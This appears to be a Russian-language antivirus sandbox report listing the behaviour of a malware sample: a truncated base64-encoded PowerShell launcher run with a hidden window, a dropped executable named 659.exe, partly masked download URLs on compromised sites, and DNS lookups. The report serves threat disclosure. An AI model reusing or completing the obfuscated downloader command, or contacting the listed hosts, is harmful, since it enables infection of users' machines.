Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAFEAWQBKAFUAcABwAG0APQAnAFcASwBPAFkATwB6AHcAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAYABSAGkAYABUAFkAUABSAG8AVABgAG8AYwBPAGwAIgAgAD...
- %HOMEPATH%\659.exe
- %HOMEPATH%\659.exe
- %HOMEPATH%\659.exe
- http://mu###rental.com/wp-includes/uwr_u4_ed3qzbb/
- http://mu###rental.com/cgi-sys/suspendedpage.cgi
- http://lt##bus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
- http://my###gen.org/_db_backups/t_e_v7qizcr2/
- http://my###nerd.com/bluesforsale/zi6_v4g0_rmyg/
- http://www.na##ers.org/Library/o_eo_97ml/
- http://www.na##ers.org/cgi-sys/suspendedpage.cgi
- DNS ASK mu###rental.com
- DNS ASK lt##bus.com
- DNS ASK my###gen.org
- DNS ASK my###nerd.com
- DNS ASK na##ers.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAFEAWQBKAFUAcABwAG0APQAnAFcASwBPAFkATwB6AHcAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAYABSAGkAYABUAFkAUABSAG8AVABgAG8AYwBPAGwAIgAgAD...' (со скрытым окном)